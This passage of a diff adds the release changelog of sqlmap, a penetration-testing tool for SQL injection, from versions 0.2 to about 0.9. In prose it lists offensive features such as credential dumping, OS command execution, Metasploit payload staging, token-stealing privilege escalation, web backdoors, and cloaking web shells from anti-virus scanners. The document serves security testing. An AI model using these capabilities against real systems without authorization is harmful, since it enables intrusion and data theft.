+* Added switches to brute-force tables names and columns names with a dictionary attack, `--common-tables` and `--common-columns`. Useful for instance when system table `information_schema` is not available on MySQL.
+* Basic support for REST-style URL parameters by using the asterisk (`*`) to mark where to test for and exploit SQL injection.
+* Added safe URL feature, `--safe-url` and `--safe-freq`.
+* Added switch `--text-only` to strip from the HTTP response body the HTML/JS code and compare pages based only on their textual content.
+* Implemented few other features and switches.
+* Over 100 bugs fixed.
+* Major code refactoring.
+* User's manual updated.
+
+# Version 0.8 (2010-03-14)
+
+* Support to enumerate and dump all databases' tables containing user provided column(s) by specifying for instance `--dump -C user,pass`. Useful to identify for instance tables containing custom application credentials.
+* Support to parse `-C` (column name(s)) when fetching columns of a table with `--columns`: it will enumerate only columns like the provided one(s) within the specified table.
+* Support for takeover features on PostgreSQL 8.4.
+* Enhanced `--priv-esc` to rely on new Metasploit Meterpreter's 'getsystem' command to elevate privileges of the user running the back-end DBMS instance to SYSTEM on Windows.
+* Automatic support in `--os-pwn` to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP, but there is a writable folder within the web server document root.
+* Fixed web backdoor functionality for `--os-cmd`, `--os-shell` and `--os-pwn` useful when web application does not support stacked queries.
+* Added support to properly read (`--read-file`) also binary files via PostgreSQL by injecting sqlmap new `sys_fileread()` user-defined function.
+* Updated active fingerprint and comment injection fingerprint for MySQL 5.1, MySQL 5.4 and MySQL 5.5.
+* Updated active fingerprint for PostgreSQL 8.4.
+* Support for NTLM authentication via python-ntlm third party library, http://code.google.com/p/python-ntlm/, `--auth-type NTLM`.
+* Support to automatically decode `deflate`, `gzip` and `x-gzip` HTTP responses.
+* Support for Certificate authentication, `--auth-cert` option added.
+* Added support for regular expression based scope when parsing Burp or Web Scarab proxy log file (`-l`), `--scope`.
+* Added option `-r` to load a single HTTP request from a text file.
+* Added switch `--ignore-proxy` to ignore the system default HTTP proxy.
+* Added support to ignore Set-Cookie in HTTP responses, `--drop-set-cookie`.
+* Added support to specify which Google dork result page to parse, `--gpage` to be used together with `-g`.
+* Major bug fix and enhancements to the multi-threading (`--threads`) functionality.
+* Fixed URL encoding/decoding of GET/POST parameters and Cookie header.
+* Refactored `--update` to use `python-svn` third party library if available or `svn` command to update sqlmap to the latest development version from subversion repository.
+* Major bugs fixed.
+* Cleanup of UDF source code repository, https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/udfhack.
+* Major code cleanup.
+* Added simple file encryption/compression utility, extra/cloak/cloak.py, used by sqlmap to decrypt on the fly Churrasco, UPX executable and web shells consequently reducing drastically the number of anti-virus software that mistakenly mark sqlmap as a malware.
+* Updated user's manual.
+* Created several demo videos, hosted on YouTube (http://www.youtube.com/user/inquisb) and linked from https://sqlmap.org/demo.html.
+
+# Version 0.8 release candidate (2009-09-21)
+
+* Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (`--os-bof`) to automatically bypass DEP memory protection.
+* Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable.
+* Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys.
+* Added options for MySQL and PostgreSQL to inject custom user-defined functions.
+* Added support for `--first` and `--last` so the user now has even more granularity in what to enumerate in the query output.
+* Minor enhancement to save the session by default in 'output/hostname/session' file if `-s` option is not specified.
+* Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system.
+* Minor bugs fixed.
+* Major code refactoring.
+
+# Version 0.7 (2009-07-25)
+
+* Adapted Metasploit wrapping functions to work with latest 3.3 development version too.
+* Adjusted code to make sqlmap 0.7 to work again on Mac OSX too.
+* Reset takeover OOB features (if any of `--os-pwn`, `--os-smbrelay` or `--os-bof` is selected) when running under Windows because msfconsole and msfcli are not supported on the native Windows Ruby interpreter. This make sqlmap 0.7 to work again on Windows too.
+* Minor improvement so that sqlmap tests also all parameters with no value (eg. par=).
+* HTTPS requests over HTTP proxy now work on either Python 2.4, 2.5 and 2.6+.
+* Major bug fix to sql-query/sql-shell features.
+* Major bug fix in `--read-file` option.
+* Major silent bug fix to multi-threading functionality.
+* Fixed the web backdoor functionality (for MySQL) when (usually) stacked queries are not supported and `--os-shell` is provided.
+* Fixed MySQL 'comment injection' version fingerprint.
+* Fixed basic Microsoft SQL Server 2000 fingerprint.
+* Many minor bug fixes and code refactoring.
+
+# Version 0.7 release candidate (2009-04-22)
+
+* Added support to execute arbitrary commands on the database server underlying operating system either returning the standard output or not via UDF injection on MySQL and PostgreSQL and via xp_cmdshell() stored procedure on Microsoft SQL Server;
+* Added support for out-of-band connection between the attacker box and the database server underlying operating system via stand-alone payload stager created by Metasploit and supporting Meterpreter, shell and VNC payloads for both Windows and Linux;
+* Added support for out-of-band connection via Microsoft SQL Server 2000 and 2005 'sp_replwritetovarbin' stored procedure heap-based buffer overflow (MS09-004) exploitation with multi-stage Metasploit payload support;
+* Added support for out-of-band connection via SMB reflection attack with UNC path request from the database server to the attacker box by using the Metasploit smb_relay exploit;
+* Added support to read and write (upload) both text and binary files on the database server underlying file system for MySQL, PostgreSQL and Microsoft SQL Server;
+* Added database process' user privilege escalation via Windows Access Tokens kidnapping on MySQL and Microsoft SQL Server via either Meterpreter's incognito extension or Churrasco stand-alone executable;
+* Speed up the inference algorithm by providing the minimum required charset for the query output;
+* Major bug fix in the comparison algorithm to correctly handle also the case that the url is stable and the False response changes the page content very little;
+* Many minor bug fixes, minor enhancements and layout adjustments.
+
+# Version 0.6.4 (2009-02-03)
+
+* Major enhancement to make the comparison algorithm work properly also on url not stables automatically by using the difflib Sequence Matcher object;
+* Major enhancement to support SQL data definition statements, SQL data manipulation statements, etc from user in SQL query and SQL shell if stacked queries are supported by the web application technology;
+* Major speed increase in DBMS basic fingerprint;
+* Minor enhancement to support an option (`--is-dba`) to show if the current user is a database management system administrator;
+* Minor enhancement to support an option (`--union-tech`) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause bruteforcing;
+* Added internal support to forge CASE statements, used only by `--is-dba` query at the moment;
+* Minor layout adjustment to the `--update` output;
+* Increased default timeout to 30 seconds;
+* Major bug fix to correctly handle custom SQL "limited" queries on Microsoft SQL Server and Oracle;
+* Major bug fix to avoid tracebacks when multiple targets are specified and one of them is not reachable;
+* Minor bug fix to make the Partial UNION query SQL injection technique work properly also on Oracle and Microsoft SQL Server;
+* Minor bug fix to make the `--postfix` work even if `--prefix` is not provided;
+* Updated documentation.
+
+# Version 0.6.3 (2008-12-18)
+
+* Major enhancement to get list of targets to test from Burp proxy (http://portswigger.net/suite/) requests log file path or WebScarab proxy (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project) 'conversations/' folder path by providing option -l <filepath>;
+* Major enhancement to support Partial UNION query SQL injection technique too;
+* Major enhancement to test if the web application technology supports stacked queries (multiple statements) by providing option `--stacked-test` which will be then used someday also by takeover functionality;
+* Major enhancement to test if the injectable parameter is affected by a time based blind SQL injection technique by providing option `--time-test`;
+* Minor enhancement to fingerprint the web server operating system and the web application technology by parsing some HTTP response headers;
+* Minor enhancement to fingerprint the back-end DBMS operating system by parsing the DBMS banner value when -b option is provided;
+* Minor enhancement to be able to specify the number of seconds before timeout the connection by providing option `--timeout #`, default is set to 10 seconds and must be 3 or higher;
+* Minor enhancement to be able to specify the number of seconds to wait between each HTTP request by providing option `--delay #`;
+* Minor enhancement to be able to get the injection payload `--prefix` and `--postfix` from user;
+* Minor enhancement to be able to enumerate table columns and dump table entries, also when the database name is not provided, by using the current database on MySQL and Microsoft SQL Server, the 'public' scheme on PostgreSQL and the 'USERS' TABLESPACE_NAME on Oracle;
+* Minor enhancemet to support also `--regexp`, `--excl-str` and `--excl-reg` options rather than only `--string` when comparing HTTP responses page content;
+* Minor enhancement to be able to specify extra HTTP headers by providing option `--headers`. By default Accept, Accept-Language and Accept-Charset headers are set;
+* Minor improvement to be able to provide CU (as current user) as user value (`-U`) when enumerating users privileges or users passwords;
+* Minor improvements to sqlmap Debian package files;
+* Minor improvement to use Python psyco (http://psyco.sourceforge.net/) library if available to speed up the sqlmap algorithmic operations;
+* Minor improvement to retry the HTTP request up to three times in case an exception is raised during the connection to the target url;
+* Major bug fix to correctly enumerate columns on Microsoft SQL Server;
+* Major bug fix so that when the user provide a SELECT statement to be processed with an asterisk as columns, now it also work if in the FROM there is no database name specified;
+* Minor bug fix to correctly dump table entries when the column is provided;
+* Minor bug fix to correctly handle session.error, session.timeout and httplib.BadStatusLine exceptions in HTTP requests;
+* Minor bug fix to correctly catch connection exceptions and notify to the user also if they occur within a thread;
+* Increased default output level from 0 to 1;
+* Updated documentation.
+
+# Version 0.6.2 (2008-11-02)
+
+* Major bug fix to correctly dump tables entries when `--stop` is not specified;
+* Major bug fix so that the users' privileges enumeration now works properly also on both MySQL < 5.0 and MySQL >= 5.0;
+* Major bug fix when the request is POST to also send the GET parameters if any have been provided;
+* Major bug fix to correctly update sqlmap to the latest stable release with command line `--update`;
+* Major bug fix so that when the expected value of a query (count variable) is an integer and, for some reasons, its resumed value from the session file is a string or a binary file, the query is executed again and its new output saved to the session file;
+* Minor bug fix in MySQL comment injection fingerprint technique;
+* Minor improvement to correctly enumerate tables, columns and dump tables entries on Oracle and on PostgreSQL when the database name is not 'public' schema or a system database;
+* Minor improvement to be able to dump entries on MySQL < 5.0 when database name, table name and column(s) are provided;
+* Updated the database management system fingerprint checks to correctly identify MySQL 5.1.x, MySQL 6.0.x and PostgreSQL 8.3;
+* More user-friendly warning messages.
+
+# Version 0.6.1 (2008-08-20)
+
+* Major bug fix to blind SQL injection bisection algorithm to handle an exception;
+* Added a Metasploit Framework 3 auxiliary module to run sqlmap;
+* Implemented possibility to test for and inject also on LIKE statements;
+* Implemented `--start` and `--stop` options to set the first and the last table entry to dump;
+* Added non-interactive/batch-mode (`--batch`) option to make it easy to wrap sqlmap in Metasploit and any other tool;
+* Minor enhancement to save also the length of query output in the session file when retrieving the query output length for ETA or for resume purposes;
+* Changed the order sqlmap dump table entries from column by column to row by row. Now it also dumps entries as they are stored in the tables, not forcing the entries' order alphabetically anymore;
+* Minor bug fix to correctly handle parameters' value with `%` character.
+
+# Version 0.6 (2008-09-01)
+
+* Complete code refactor and many bugs fixed;
+* Added multithreading support to set the maximum number of concurrent HTTP requests;
+* Implemented SQL shell (`--sql-shell`) functionality and fixed SQL query (`--sql-query`, before called `-e`) to be able to run whatever SELECT statement and get its output in both inband and blind SQL injection attack;
+* Added an option (`--privileges`) to retrieve DBMS users privileges, it also notifies if the user is a DBMS administrator;
+* Added support (`-c`) to read options from configuration file, an example of valid INI file is sqlmap.conf and support (`--save`) to save command line options on a configuration file;
+* Created a function that updates the whole sqlmap to the latest stable version available by running sqlmap with `--update` option;
+* Created sqlmap .deb (Debian, Ubuntu, etc.) and .rpm (Fedora, etc.) installation binary packages;
+* Created sqlmap .exe (Windows) portable executable;
+* Save a lot of more information to the session file, useful when resuming injection on the same target to not loose time on identifying injection, UNION fields and back-end DBMS twice or more times;
+* Improved automatic check for parenthesis when testing and forging SQL query vector;
+* Now it checks for SQL injection on all GET/POST/Cookie parameters then it lets the user select which parameter to perform the injection on in case that more than one is injectable;
+* Implemented support for HTTPS requests over HTTP(S) proxy;
+* Added a check to handle NULL or not available queries output;
+* More entropy (randomStr() and randomInt() functions in lib/core/common.py) in inband SQL injection concatenated query and in AND condition checks;
+* Improved XML files structure;
+* Implemented the possibility to change the HTTP Referer header;
+* Added support to resume from session file also when running with inband SQL injection attack;
+* Added an option (`--os-shell`) to execute operating system commands if the back-end DBMS is MySQL, the web server has the PHP engine active and permits write access on a directory within the document root;
+* Added a check to assure that the provided string to match (`--string`) is within the page content;
+* Fixed various queries in XML file;
+* Added LIMIT, ORDER BY and COUNT queries to the XML file and adapted the library to parse it;
+* Fixed password fetching function, mainly for Microsoft SQL Server and reviewed the password hashes parsing function;
+* Major bug fixed to avoid tracebacks when the testable parameter(s) is dynamic, but not injectable;
+* Enhanced logging system: added three more levels of verbosity to show also HTTP sent and received traffic;
+* Enhancement to handle Set-Cookie from target url and automatically re-establish the Session when it expires;
+* Added support to inject also on Set-Cookie parameters;
+* Implemented TAB completion and command history on both `--sql-shell` and `--os-shell`;
+* Renamed some command line options;
+* Added a conversion library;
+* Added code schema and reminders for future developments;
+* Added Copyright comment and $Id$;
+* Updated the command line layout and help messages;
+* Updated some docstrings;
+* Updated documentation files.
+
+# Version 0.5 (2007-11-04)
+
+* Added support for Oracle database management system
+* Extended inband SQL injection functionality (`--union-use`) to all other possible queries since it only worked with `-e` and `--file` on all DMBS plugins;
+* Added support to extract database users password hash on Microsoft SQL Server;
+* Added a fuzzer function with the aim to parse HTML page looking for standard database error messages consequently improving database fingerprinting;
+* Added support for SQL injection on HTTP Cookie and User-Agent headers;
+* Reviewed HTTP request library (lib/request.py) to support the extended inband SQL injection functionality. Split getValue() into getInband() and getBlind();
+* Major enhancements in common library and added checkForBrackets() method to check if the bracket(s) are needed to perform a UNION query SQL injection attack;
+* Implemented `--dump-all` functionality to dump entire DBMS data from all databases tables;
+* Added support to exclude DBMS system databases' when enumeration tables and dumping their entries (`--exclude-sysdbs`);
+* Implemented in Dump.dbTableValues() method the CSV file dumped data automatic saving in csv/ folder by default;
+* Added DB2, Informix and Sybase DBMS error messages and minor improvements in xml/errors.xml;
+* Major improvement in all three DBMS plugins so now sqlmap does not get entire databases' tables structure when all of database/table/ column are specified to be dumped;
+* Important fixes in lib/option.py to make sqlmap properly work also with python 2.5 and handle the CSV dump files creation work also under Windows operating system, function __setCSVDir() and fixed also in lib/dump.py;
+* Minor enhancement in lib/injection.py to randomize the number requested to test the presence of a SQL injection affected parameter and implemented the possibilities to break (q) the for cycle when using the google dork option (`-g`);
+* Minor fix in lib/request.py to properly encode the url to request in case the "fixed" part of the url has blank spaces;
+* More minor layout enhancements in some libraries;
+* Renamed DMBS plugins;
+* Complete code refactoring, a lot of minor and some major fixes in libraries, many minor improvements;
+* Updated all documentation files.
+
+# Version 0.4 (2007-06-15)
+
+* Added DBMS fingerprint based also upon HTML error messages parsing defined in lib/parser.py which reads an XML file defining default error messages for each supported DBMS;
+* Added Microsoft SQL Server extensive DBMS fingerprint checks based upon accurate '@@version' parsing matching on an XML file to get also the exact patching level of the DBMS;
+* Added support for query ETA (Estimated Time of Arrival) real time calculation (`--eta`);
+* Added support to extract database management system users password hash on MySQL and PostgreSQL (`--passwords`);
+* Added docstrings to all functions, classes and methods, consequently released the sqlmap development documentation <https://sqlmap.org/dev/>;
+* Implemented Google dorking feature (`-g`) to take advantage of Google results affected by SQL injection to perform other command line argument on their DBMS;
+* Improved logging functionality: passed from banal 'print' to Python native logging library;
+* Added support for more than one parameter in `-p` command line option;
+* Added support for HTTP Basic and Digest authentication methods (`--basic-auth` and `--digest-auth`);
+* Added the command line option `--remote-dbms` to manually specify the remote DBMS;
+* Major improvements in union.UnionCheck() and union.UnionUse() functions to make it possible to exploit inband SQL injection also with database comment characters (`--` and `#`) in UNION query statements;
+* Added the possibility to save the output into a file while performing the queries (`-o OUTPUTFILE`) so it is possible to stop and resume the same query output retrieving in a second time (`--resume`);
+* Added support to specify the database table column to enumerate (`-C COL`);
+* Added inband SQL injection (UNION query) support (`--union-use`);
+* Complete code refactoring, a lot of minor and some major fixes in libraries, many minor improvements;
+* Reviewed the directory tree structure;
+* Split lib/common.py: inband injection functionalities now are moved to lib/union.py;
+* Updated documentation files.
+
+# Version 0.3 (2007-01-20)
+
+* Added module for MS SQL Server;
+* Strongly improved MySQL dbms active fingerprint and added MySQL comment injection check;
+* Added PostgreSQL dbms active fingerprint;
+* Added support for string match (`--string`);
+* Added support for UNION check (`--union-check`);
+* Removed duplicated code, delegated most of features to the engine in common.py and option.py;
+* Added support for `--data` command line argument to pass the string for POST requests;
+* Added encodeParams() method to encode url parameters before making http request;
+* Many bug fixes;
+* Rewritten documentation files;
+* Complete code restyling.
+
+# Version 0.2 (2006-12-13)
+
+* complete refactor of entire program;
+* added TODO and THANKS files;
+* added some papers references in README file;
+* moved headers to user-agents.txt, now -f parameter specifies a file (user-agents.txt) and randomize the selection of User-Agent header;
+* strongly improved program plugins (mysqlmap.py and postgres.py), major enhancements: * improved active mysql fingerprint check_dbms(); * improved enumeration functions for both databases; * minor changes in the unescape() functions;
+* replaced old inference algorithm with a new bisection algorithm.
+* reviewed command line parameters, now with -p it's possible to specify the parameter you know it's vulnerable to sql injection, this way the script won't perform the sql injection checks itself; removed the TOKEN parameter;
+* improved Common class, adding support for http proxy and http post method in hash_page;
+* added OptionCheck class in option.py which performs all needed checks on command line parameters and values;
+* added InjectionCheck class in injection.py which performs check on url stability, dynamics of parameters and injection on dynamic url parameters;
+* improved output methods in dump.py;
+* layout enhancement on main program file (sqlmap.py), adapted to call new option/injection classes and improvements on catching of exceptions.